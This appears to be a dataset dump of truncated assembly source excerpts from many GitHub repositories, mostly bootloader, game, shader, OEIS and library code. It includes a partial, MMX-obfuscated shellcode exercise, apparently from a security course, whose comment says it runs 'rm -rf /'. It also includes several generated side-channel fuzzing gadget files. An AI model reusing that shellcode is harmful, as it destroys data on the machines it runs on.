and %rbx, %rbx
lea addresses_nor... |
MemoryFix/OsxAptioFixDrv/X64/RTShims.nasm | crazyinsanejames/CloverBootloader | 3,861 | 44116 | BITS 64
DEFAULT REL
%macro ConstructShim 1
%if %1 > 5
%error "At Most 5 Args Supported."
%endif
push rsi
push rbx
sub rsp, 0x28
pushfq
cli
pop rsi
push rax
mov rbx, cr0
mov rax, rbx
and rax, 0xf... |
Games/banchorce/source/boss6.asm | CiaranGruber/Ti-84-Calculator | 1 | 44117 | <reponame>CiaranGruber/Ti-84-Calculator
;---------------------------------------------------------------;
; ;
; Banchor ;
; Margoth Boss Routines ;
; ... |
data/pokemon/base_stats/graveler.asm | AtmaBuster/pokeplat-gen2 | 6 | 44118 | db 0 ; species ID placeholder
db 55, 95, 115, 35, 45, 45
; hp atk def spd sat sdf
db ROCK, GROUND ; type
db 120 ; catch rate
db 134 ; base exp
db NO_ITEM, EVERSTONE ; items
db GENDER_F50 ; gender ratio
db 15 ; step cycles to hatch
INCBIN "gfx/pokemon/graveler/front.dimensions"
db GROWTH_MEDIUM_... |
src/shaders/post_processing/gen5_6/Core_Kernels/PL_DNDI_ALG_UVCopy_NV12.asm | tizenorg/platform.upstream.libva-intel-driver | 0 | 44119 | <filename>src/shaders/post_processing/gen5_6/Core_Kernels/PL_DNDI_ALG_UVCopy_NV12.asm<gh_stars>0
/*
* All Video Processing kernels
* Copyright © <2010>, Intel Corporation.
*
* This program is licensed under the terms and conditions of the
* Eclipse Public License (EPL), version 1.0. The full text of the EPL is a... |
Working Disassembly/General/Sprites/Shields/DPLC - Fire Shield.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 5 | 44121 | dc.w word_19D18-DPLC_FireShield
dc.w word_19D20-DPLC_FireShield
dc.w word_19D28-DPLC_FireShield
dc.w word_19D30-DPLC_FireShield
dc.w word_19D38-DPLC_FireShield
dc.w word_19D3E-DPLC_FireShield
dc.w word_19D46-DPLC_FireShield
dc.w word_19D4E-DPLC_FireShield
dc.w word_19D56-DPLC_FireShield
dc.w word_19... |
Assembly/OS/STARTUP.asm | p-rivero/CESC16 | 2 | 44122 | ; ============================
; Startup/Interrupt Routines
; ============================
#bank program
STARTUP:
; Reset vector (hardware entry point):
.Reset:
; A nop ensures that a reset is performed correctly, regardless of the clock state
nop
; Disable timer
mov [TMR_ACTIVE], zero
; Initiali... |
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_980.asm | ljhsiun2/medusa | 9 | 44124 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r15
push %rbp
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_normal_ht+0x13a50, %rbx
nop
nop
nop
nop
cmp %rbp, %rbp
mov $0x6162636465666768, %rdx
movq %rdx, (%rbx)
nop
xor %rdx, %rdx
lea addresses_WT_ht+0x13130, %r11
clflush (%r11)
... |
data/mapHeaders/ceruleanhouse1.asm | adhi-thirumala/EvoYellow | 16 | 44126 | <reponame>adhi-thirumala/EvoYellow
CeruleanHouse1_h:
db HOUSE ; tileset
db CERULEAN_HOUSE_1_HEIGHT, CERULEAN_HOUSE_1_WIDTH ; dimensions (y, x)
dw CeruleanHouse1Blocks, CeruleanHouse1TextPointers, CeruleanHouse1Script ; blocks, texts, scripts
db $00 ; connections
dw CeruleanHouse1Object ; objects
|
src/drivers/parallel.asm | pwk4m1/TinyBIOS | 23 | 44127 | <filename>src/drivers/parallel.asm
; BSD 3-Clause License
;
; Copyright (c) 2020, k4m1 <<EMAIL>>
; All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions are met:
;
; * Redistributions of source code must retain... |
examples/unapi-specless.asm | Konamiman/MSX-UNAPI-specification | 6 | 44129 | <gh_stars>1-10
;--- Sample MSX-UNAPI specificationless application
; By <NAME>, 5-2019
;
; This code implements a simple TSR that makes the CAPS led to blink,
; by hooking on the timer interrupt. It offers just one functions:
; Function 1: Set the blink rate
;
; The code installs on a mapped RA... |
libsrc/_DEVELOPMENT/alloc/obstack/c/sccz80/obstack_init.asm | teknoplop/z88dk | 8 | 44130 |
; void *obstack_init(struct obstack *ob, size_t size)
SECTION code_clib
SECTION code_alloc_obstack
PUBLIC obstack_init
EXTERN asm_obstack_init
obstack_init:
pop af
pop bc
pop de
push de
push bc
push af
jp asm_obstack_init
|
libsrc/_DEVELOPMENT/stdio/c/sdcc_ix/sprintf.asm | meesokim/z88dk | 0 | 44131 |
; int sprintf(char *s, const char *format, ...)
SECTION code_stdio
PUBLIC _sprintf
EXTERN asm_sprintf
_sprintf:
push ix
call asm_sprintf
pop ix
ret
|
mikeos/os.asm | techgaun/dumpster | 1 | 44134 | BITS 16
start:
mov ax, 07C0h
add ax, 288
mov ss, ax
mov sp, 4096
mov ax, 07C0h
mov ds, ax
mov si, text_string
call print_string
jmp $
text_string db 'Welcome to MikeOS', 0
print_string:
mov ah, 0Eh
.repeat:
lodsb
cmp al, 0
je .done
int 10h
jmp .repeat
.done:
ret
times 510-($... |
Driver/Printer/Fax/FaxPrint/faxprintDriverInfo.asm | steakknife/pcgeos | 504 | 44135 | <filename>Driver/Printer/Fax/FaxPrint/faxprintDriverInfo.asm
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Geoworks 1994. All rights reserved.
GEOWORKS CONFIDENTIAL
PROJECT: Tiramisu
MODULE: Fax
FILE: group3DriverInfo.asm
AUTHOR: <NAME>, Mar 10, 1993
R... |
programs/oeis/085/A085931.asm | karttu/loda | 0 | 44136 | <reponame>karttu/loda<filename>programs/oeis/085/A085931.asm
; A085931: Leading diagonal of A085930.
; 2,4,12,17,23,39,48,58,69,95,109,124,140,157,195,215,236,258,281,305,357,384,412,441,471,502,534,602,637,673,710,748,787,827,868,954,998,1043,1089,1136,1184,1233,1283,1334,1440,1494,1549,1605,1662,1720,1779,1839,1900,1... |
s0901_.asm | zhangyuesai/8086-asm-learning-code | 1 | 44139 | <reponame>zhangyuesai/8086-asm-learning-code
assume cs:codesg
codesg segment
s:
mov ax,bx
mov si,offset s
mov di,offset s0
mov ax,cs:[si]
mov cs:[di],ax
s0:
nop
nop
codesg ends
end s
\ |
C51/Examples/ST uPSD/upsd3300/Banking/benchmark.a51 | AllRoundeer/Keil | 0 | 44140 | ;-------------------------------------------------------------------------------
; Simple 8032 Benchmark assembly code
;
benchmrk SEGMENT CODE
RSEG benchmrk
PUBLIC benchmark ; Public entry point
; r4 = Loop 1 counter (10..0)
; r5 = loop 2 counter (93..0)
; r6 = msb of return value - nu... |
zdrojaky/obfuskace/zmena-poradi-kodu2.asm | Zelvar/VSB-DP-TEXT | 0 | 44141 | arrayMax:
enter 0,0
jmp .start
.continue:
mov ecx, [ ebp + 12 ]
.back:
cmp eax, [ edx + ecx * 4 - 4 ]
jg .skip
mov eax, [ edx + ecx * 4 - 4 ]
.skip:
loop .back
jmp .end
.start:
mov eax, [ edx ]
mov edx, [ ebp + 8 ]
jmp .continue
.end:
leave
ret |
programs/oeis/160/A160156.asm | karttu/loda | 1 | 44142 | ; A160156: Partial sums of A007583.
; 1,4,15,58,229,912,3643,14566,58257,233020,932071,3728274,14913085,59652328,238609299,954437182,3817748713,15270994836,61083979327,244335917290,977343669141,3909374676544,15637498706155,62549994824598
add $0,1
mov $1,$0
mov $2,4
pow $2,$0
add $0,$2
mul $0,2
add $0,$1
mov $1,$0
sub ... |
pin-2.11/source/tools/AVX/verify_fp_context_ia32.asm | swchoi1994/Project | 3 | 44143 |
.686
.XMM
.model flat, c
PUBLIC Do_Xsave
PUBLIC Do_Fxsave
PUBLIC Do_Xrstor
PUBLIC Do_Fxrstor
.code
Do_Xsave PROC
push ebp
mov ebp, esp
mov ecx, [8+ebp]
xor edx,edx
mov eax,7
xsave ymmword ptr[ecx]
pop ebp
ret
Do_Xsave ENDP
.code
Do_Fxsave PROC
push ebp
mov e... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_52.asm | ljhsiun2/medusa | 9 | 44144 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r8
push %r9
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0xa9f9, %rsi
lea addresses_WT_ht+0x152f9, %rdi
clflush (%rsi)
add $22475, %rbp
mov $96, %rcx
rep movsb
nop
nop
cmp $47860, %r8
lea addresses_WT_ht+0x18f9, %r8
nop
... |
examples/preprocessor.asm | Bunogi/c8asm | 0 | 44146 | <gh_stars>0
;;; Preprocessor test file.
#define player_x v0
#define player_y v1
#define reminder ;;
ld $player_x, 0
ld $player_y, 0
$reminder This line should be commented out.
|
oeis/204/A204271.asm | neoneye/loda-programs | 11 | 44149 | <gh_stars>10-100
; A204271: a(n) = sigma(n)*Pell(n), where sigma(n) = A000203(n), the sum of divisors of n.
; Submitted by <NAME>
; 1,6,20,84,174,840,1352,6120,12805,42804,68892,388080,468454,1938768,4680600,14595792,20460402,107024190,132502180,671765976,1235646880,3356004888,5401408344,32600383200,40663881751,1330062... |
source/Crinkler/modules/runtime.asm | Vertver/Crinkler | 739 | 44151 | ;; -*- tab-width: 4 -*-
bits 32
extern __imp____getmainargs
extern __imp__ExitProcess@4
extern _main
global _mainCRTStartup
section console text align=1
_mainCRTStartup:
push eax
mov dword [esp], esp
push eax
mov dword [esp], esp
push eax
mov dword [esp], esp
call ... |
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_7774_142.asm | ljhsiun2/medusa | 9 | 44152 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r15
push %r8
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x13d80, %rsi
lea addresses_UC_ht+0xfb70, %rdi
nop
nop
nop
nop
nop
xor $45921, %r15
mov $102, %rcx
rep movsq
nop
nop
nop
and $15781, %r12
lea addresses_D_ht+0x1c... |
programs/oeis/064/A064650.asm | jmorken/loda | 1 | 44153 | <reponame>jmorken/loda
; A064650: a(n) = floor(a(n-1)/2) + a(n-2) with a(0)=1, a(1)=2.
; 1,2,2,3,3,4,5,6,8,10,13,16,21,26,34,43,55,70,90,115,147,188,241,308,395,505,647,828,1061,1358,1740,2228,2854,3655,4681,5995,7678,9834,12595,16131,20660,26461,33890,43406,55593,71202,91194,116799,149593,191595,245390,314290,402535,5... |
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_620.asm | ljhsiun2/medusa | 9 | 44154 | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x3b9d, %rsi
lea addresses_UC_ht+0x1079d, %rdi
clflush (%rdi)
nop
dec %rdx
mov $94, %rcx
rep movsq
nop
nop
dec %r15
lea addresses_WT_ht+0x1579d, %r12
dec %r9
movw $0x6162, (%r12)
sub $481... |
programs/oeis/138/A138287.asm | neoneye/loda | 22 | 44155 | <filename>programs/oeis/138/A138287.asm
; A138287: Palindromic period 10: repeat 0, 2, 8, 4, 6, 6, 4, 8, 2, 0.
; 0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0,0,2,8,4,6,6,4,8,2,0
mov $1... |
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_2797.asm | ljhsiun2/medusa | 9 | 44156 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r8
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0xf6a, %r8
clflush (%r8)
xor %rax, %rax
movw $0x6162, (%r8)
nop
nop
nop
add %rsi, %rsi
lea addresses_normal_ht+0xff6a, %rsi
lea addresses_WC_ht+0x18239,... |
exercise_6/execve_rm_rf_polymorphic_mmx.asm | vikrant-navalgund/SLAE32 | 3 | 44157 | <reponame>vikrant-navalgund/SLAE32
BITS 32
section .text
global _start
; execve("/bin/rm", {"/bin/rm", "-rf", "/", 0}, 0) - 68 bytes
_start:
push 0xabd9c5c9
push 0xc684c284
movd mm0, [esp]
movd mm1, [esp+4h]
punpcklbw mm0, mm1
mov ebx, esp
movq [ebx], mm0
xor ecx,ecx
imul ecx
push 0x2f
mov ecx, esp
push 0... |
programs/oeis/082/A082977.asm | neoneye/loda | 22 | 44162 | <filename>programs/oeis/082/A082977.asm
; A082977: Numbers that are congruent to {0, 1, 3, 5, 6, 8, 10} mod 12.
; 0,1,3,5,6,8,10,12,13,15,17,18,20,22,24,25,27,29,30,32,34,36,37,39,41,42,44,46,48,49,51,53,54,56,58,60,61,63,65,66,68,70,72,73,75,77,78,80,82,84,85,87,89,90,92,94,96,97,99,101,102,104,106,108,109,111,113,114... |
programs/oeis/014/A014689.asm | jmorken/loda | 1 | 44163 | <filename>programs/oeis/014/A014689.asm
; A014689: a(n) = prime(n)-n, the number of nonprimes less than prime(n).
; 1,1,2,3,6,7,10,11,14,19,20,25,28,29,32,37,42,43,48,51,52,57,60,65,72,75,76,79,80,83,96,99,104,105,114,115,120,125,128,133,138,139,148,149,152,153,164,175,178,179,182,187,188,197,202,207,212,213,218,221,22... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.